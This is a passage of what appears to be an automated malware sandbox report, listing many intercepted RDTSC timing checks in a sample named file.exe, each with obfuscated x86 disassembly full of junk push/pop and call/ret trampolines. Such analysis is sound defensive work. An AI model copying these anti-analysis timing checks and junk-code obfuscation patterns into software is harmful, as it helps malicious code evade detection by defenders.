00007F5E810FCBB4h 0x0000005f mov esi, dword ptr [ebp+122D1C24h] 0x00000065 pop edi 0x00000066 xchg eax, ebx 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a push esi 0x0000006b pop esi 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0A161 second address: D0A165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0BE2D second address: D0BE40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E810FCBAEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0AA54 second address: D0AA7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F5E8080F360h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5E8080F360h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0F9CA second address: D0F9E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E810FCBADh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D10004 second address: D10078 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5E8080F356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F5E8080F367h 0x00000010 nop 0x00000011 mov edi, 710ED36Ah 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+1244F241h], edi 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007F5E8080F358h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 00000016h 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a jmp 00007F5E8080F369h 0x0000003f xchg eax, ebx 0x00000040 jl 00007F5E8080F364h 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0D22C second address: D0D249 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E810FCBB9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D10078 second address: D1007C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1007C second address: D10091 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jc 00007F5E810FCBB2h 0x0000000d jc 00007F5E810FCBACh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D13438 second address: D1347B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F366h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D1D20h], ecx 0x00000013 push 00000000h 0x00000015 movsx edi, bx 0x00000018 push 00000000h 0x0000001a or bl, FFFFFF98h 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 jmp 00007F5E8080F360h 0x00000026 pop eax 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D111A8 second address: D111AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D14491 second address: D14497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D14497 second address: D14531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jnp 00007F5E810FCBBBh 0x0000000c nop 0x0000000d call 00007F5E810FCBB4h 0x00000012 jmp 00007F5E810FCBB6h 0x00000017 pop edi 0x00000018 push 00000000h 0x0000001a jmp 00007F5E810FCBB7h 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 call 00007F5E810FCBA8h 0x00000029 pop ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e add dword ptr [esp+04h], 0000001Dh 0x00000036 inc ebx 0x00000037 push ebx 0x00000038 ret 0x00000039 pop ebx 0x0000003a ret 0x0000003b mov ebx, dword ptr [ebp+1244D25Bh] 0x00000041 xchg eax, esi 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D14531 second address: D14537 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D15393 second address: D153AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D146DF second address: D146EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push ebx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D153AF second address: D153BE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D153BE second address: D153C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D146EB second address: D14750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 nop 0x00000007 push dword ptr fs:[00000000h] 0x0000000e sub dword ptr [ebp+1244F241h], edi 0x00000014 mov dword ptr fs:[00000000h], esp 0x0000001b mov edi, dword ptr [ebp+122D1CF3h] 0x00000021 mov eax, dword ptr [ebp+122D0139h] 0x00000027 or dword ptr [ebp+122D2B62h], eax 0x0000002d push FFFFFFFFh 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 call 00007F5E810FCBA8h 0x00000037 pop ecx 0x00000038 mov dword ptr [esp+04h], ecx 0x0000003c add dword ptr [esp+04h], 00000017h 0x00000044 inc ecx 0x00000045 push ecx 0x00000046 ret 0x00000047 pop ecx 0x00000048 ret 0x00000049 jc 00007F5E810FCBA8h 0x0000004f mov edi, ecx 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jnc 00007F5E810FCBACh 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D153C2 second address: D153C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D14750 second address: D14756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D153C8 second address: D153CD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D16363 second address: D16375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E810FCBAEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D16375 second address: D16388 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F5E8080F356h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D16388 second address: D163A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D163A4 second address: D1642F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F363h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F5E8080F358h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 sub dword ptr [ebp+122D3012h], ebx 0x0000002a xor edi, dword ptr [ebp+122D2DE5h] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007F5E8080F358h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 00000016h 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c push 00000000h 0x0000004e push 00000000h 0x00000050 push eax 0x00000051 call 00007F5E8080F358h 0x00000056 pop eax 0x00000057 mov dword ptr [esp+04h], eax 0x0000005b add dword ptr [esp+04h], 00000015h 0x00000063 inc eax 0x00000064 push eax 0x00000065 ret 0x00000066 pop eax 0x00000067 ret 0x00000068 xchg eax, esi 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d jnp 00007F5E8080F356h 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1642F second address: D16435 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D165DC second address: D165E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D183F7 second address: D183FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1A347 second address: D1A3A0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F5E8080F358h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push ecx 0x00000026 mov ebx, dword ptr [ebp+122D3C40h] 0x0000002c pop edi 0x0000002d push 00000000h 0x0000002f mov edi, 77A75870h 0x00000034 push 00000000h 0x00000036 cmc 0x00000037 xchg eax, esi 0x00000038 jmp 00007F5E8080F35Dh 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push esi 0x00000041 jmp 00007F5E8080F35Ah 0x00000046 pop esi 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1A3A0 second address: D1A3A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1C49C second address: D1C4A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F5E8080F356h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1A556 second address: D1A568 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5E810FCBA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1D685 second address: D1D69A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5E8080F35Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1A568 second address: D1A572 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5E810FCBA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F856 second address: D1F87A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D217AA second address: D217B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D29022 second address: D2902C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5E8080F356h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2EF9E second address: D2EFA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2F1FD second address: D2F201 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2F201 second address: D2F207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2F207 second address: D2F220 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5E8080F35Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2F220 second address: D2F226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2F226 second address: D2F22B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D33104 second address: D33108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D33108 second address: D3310E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D334BE second address: D334D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F5E810FCBA6h 0x0000000d jmp 00007F5E810FCBAAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D334D5 second address: D334D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D33626 second address: D3362B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D33944 second address: D339A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E8080F35Dh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F5E8080F366h 0x0000000f js 00007F5E8080F356h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push esi 0x0000001a jne 00007F5E8080F356h 0x00000020 jmp 00007F5E8080F368h 0x00000025 pop esi 0x00000026 pushad 0x00000027 push eax 0x00000028 pop eax 0x00000029 push edx 0x0000002a pop edx 0x0000002b jnc 00007F5E8080F356h 0x00000031 popad 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D339A6 second address: D339AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D39282 second address: D392CC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5E8080F36Ch 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F5E8080F364h 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F5E8080F366h 0x00000017 pop ebx 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jo 00007F5E8080F379h 0x00000020 push eax 0x00000021 push edx 0x00000022 jg 00007F5E8080F356h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D392CC second address: D392D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D392D0 second address: D392D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC84A5 second address: CC84AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D37F0A second address: D37F38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F368h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F5E8080F35Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D37F38 second address: D37F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F5E810FCBAEh 0x0000000b jmp 00007F5E810FCBB9h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5E810FCBB6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D37F7D second address: D37F9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F5E8080F356h 0x0000000a jmp 00007F5E8080F364h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38133 second address: D3813F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5E810FCBA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38597 second address: D385B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E8080F367h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3870E second address: D38712 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38712 second address: D3871E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38BCC second address: D38BD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38BD4 second address: D38BD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38BD8 second address: D38BDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D40627 second address: D40650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F5E8080F356h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007F5E8080F367h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D40650 second address: D4067A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB9h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jng 00007F5E810FCBCFh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4067A second address: D4069B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E8080F363h 0x00000009 popad 0x0000000a pushad 0x0000000b jo 00007F5E8080F356h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3F30E second address: D3F313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3F313 second address: D3F325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5E8080F356h 0x0000000a jo 00007F5E8080F356h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3F46E second address: D3F479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007F5E810FCBA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3F479 second address: D3F488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F5E8080F356h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3F77C second address: D3F781 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3F781 second address: D3F796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b je 00007F5E8080F356h 0x00000011 pop esi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3F8EF second address: D3F8F4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3FA70 second address: D3FA77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3FA77 second address: D3FA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3FA82 second address: D3FA86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3FC56 second address: D3FC5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3FC5B second address: D3FC61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3FEEA second address: D3FEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F5E810FCBABh 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3FEFD second address: D3FF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3FF03 second address: D3FF10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F5E810FCBA6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D400A0 second address: D400A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D400A4 second address: D400B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F5E810FCBA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07193 second address: D071B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F5E8080F356h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D071B8 second address: D071BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07419 second address: D07446 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5E8080F356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F5E8080F358h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007F5E8080F365h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
